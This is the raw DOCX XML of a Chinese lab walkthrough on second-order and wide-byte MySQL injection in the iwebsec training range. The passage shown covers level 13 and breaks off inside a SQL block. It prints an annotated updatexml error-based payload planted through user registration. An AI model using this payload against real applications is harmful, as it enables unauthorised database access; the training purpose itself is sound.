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36835" w14:textId="77777777" w:rsidR="007220A3" w:rsidRDefault="003C05FE">
      <w:pPr>
        <w:spacing w:before="480" w:after="480" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve">iwebsec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>二次注入与宽字节注入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>完整解析（含报错解决</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>逐行注释</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>可复制</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>Payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E6E650" w14:textId="77777777" w:rsidR="007220A3" w:rsidRDefault="003C05FE">
      <w:pPr>
        <w:spacing w:before="380" w:after="140" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="heading_0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>前言</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="61658566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本文整合</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>iwebsec</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>靶场第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>13</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>关（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>二次注入）与第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>关（宽字节注入）的完整通关流程、逐行</w:t>
      </w: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注释、核心原理、漏洞成因及安全危害，兼顾手工注入实操与理论剖析，适合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注入入门学习者对照实操，同时理解两种注入方式的本质区别与防御逻辑。文末单独提炼所有可直接复制的</w:t>
      </w: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，方便实操使用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244E4242" w14:textId="77777777" w:rsidR="007220A3" w:rsidRDefault="003C05FE">
      <w:pPr>
        <w:spacing w:before="380" w:after="140" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="heading_1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>第一部分：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">iwebsec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>13</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>关</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>二次注入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>完整解析</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="5CF629FF" w14:textId="77777777" w:rsidR="007220A3" w:rsidRDefault="003C05FE">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="heading_2"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>一、漏洞核心信息</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="0FDFF178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靶场</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>http://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>靶场地址</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/sqli/13/index.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313EB1C7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注入类型：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>二次注入（存储型注入的特殊形式）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D333A82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核心特征：分两步触发，首次输入转义入库，二次调用未校验，恶意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拼接执行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F2742B" w14:textId="77777777" w:rsidR="007220A3" w:rsidRDefault="003C05FE">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="heading_3"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>二、逐行实操（含</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>注释）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="28924744" w14:textId="77777777" w:rsidR="007220A3" w:rsidRDefault="003C05FE">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="heading_4"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>步骤</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>：注册恶意用户（注入前置操作）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="2CD45A13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注册页面输入以下内容，完成恶意数据入库：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60"/>
        <w:gridCol w:w="2760"/>
        <w:gridCol w:w="2760"/>
      </w:tblGrid>
      <w:tr w:rsidR="007220A3" w14:paraId="7ADE278D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FFCFC9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字段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D76C81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输入内容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2F8925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逐行注释（核心解析）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007220A3" w14:paraId="027F09F8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F7F1C2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用户名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4BC658D" w14:textId="108981B5" w:rsidR="007220A3" w:rsidRDefault="001F3936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 w:hint="eastAsia"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>admin</w:t>
            </w:r>
            <w:r w:rsidR="003C05FE">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>' or updatexml(1,concat(0x7e,(version())),0)#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B14758" w14:textId="23B05AF9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 xml:space="preserve">1. </w:t>
            </w:r>
            <w:r w:rsidR="001F3936">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>admin</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>：任意用户名前缀，用于构造恶意注入逻辑，无需匹配数据库中已有用户；</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">2. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>：单引号，用于闭合后续</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>SQL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>语句中</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>的用户名查询条件；</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>3. or</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>：逻辑或，确保后续报错语句无论前缀是否匹配都能执行；</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>4. updatexml(1,concat(0x7e,(version())),0)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>：核心报错语句，</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>updatexml()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>函数参数不合法触发报错，</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>concat(0x7e,(version()),0x7e)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>拼接</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>~</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>与数据库版本号，方便回显；</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>5. #</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>MySQL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>注释符，注释掉单引号后面的所有</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>SQL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>内容，避免语法报错；</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">6. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>整体作用：构造恶意用户名，二次调用时触发报错，直接回显数据库版本号，简化注入操</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>作。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007220A3" w14:paraId="7F8E1610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49D393E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lastRenderedPageBreak/>
              <w:t>密码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77BB83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123456</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>（任意）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C77F83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无注入意义，仅用于完成注册流程，自定义即可。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007220A3" w14:paraId="784D520F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87E5CB2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邮箱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6974C5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test@test.com</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>（任意）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80A9731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无注入意义，仅用于完成注册流程，自定义即可，后续找回密码需使用该邮箱。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="56CAE495" w14:textId="3CB93FCD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操作说明：点击「注册」按钮，此时程序会对用户名中的单引号进行转义（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>addslashes()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>），将</w:t>
      </w:r>
      <w:r w:rsidR="001F3936">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>' or updatexml(1,concat(0x7e,(version())),0)#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>转义为</w:t>
      </w:r>
      <w:r w:rsidR="001F3936">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>\' or updatexml(1,concat(0x7e,(version())),0)#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>存入数据库，但数据库会保</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>留原始恶意字符（</w:t>
      </w:r>
      <w:r w:rsidR="001F3936">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>' or updatexml(1,concat(0x7e,(version())),0)#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>），为后续注入埋下隐患。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4F2D00" w14:textId="77777777" w:rsidR="007220A3" w:rsidRDefault="003C05FE">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="heading_5"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>步骤</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>：触发二次注入（找回密码功能）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="391C3375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1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>点击注册页面下方「通过邮箱找回密码」，进入找回密码页面；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B567E1E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2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>输入注册时的邮箱：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>test@test.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，提交请求；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E606ED5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3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>底层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执行逻辑（含注释）：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7220A3" w14:paraId="1B795B5F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CB1006" w14:textId="7E146B8D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lastRenderedPageBreak/>
              <w:t>sql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 xml:space="preserve">-- </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>程序从数据库取出之前注册的用户名：</w:t>
            </w:r>
            <w:r w:rsidR="001F3936">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Consolas" w:hint="eastAsia"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>admin</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">' or </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>updatexml(1,concat(0x7e,(version())),0)#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-- </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>未做任何过滤，直接拼接</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>SQL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>语句</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
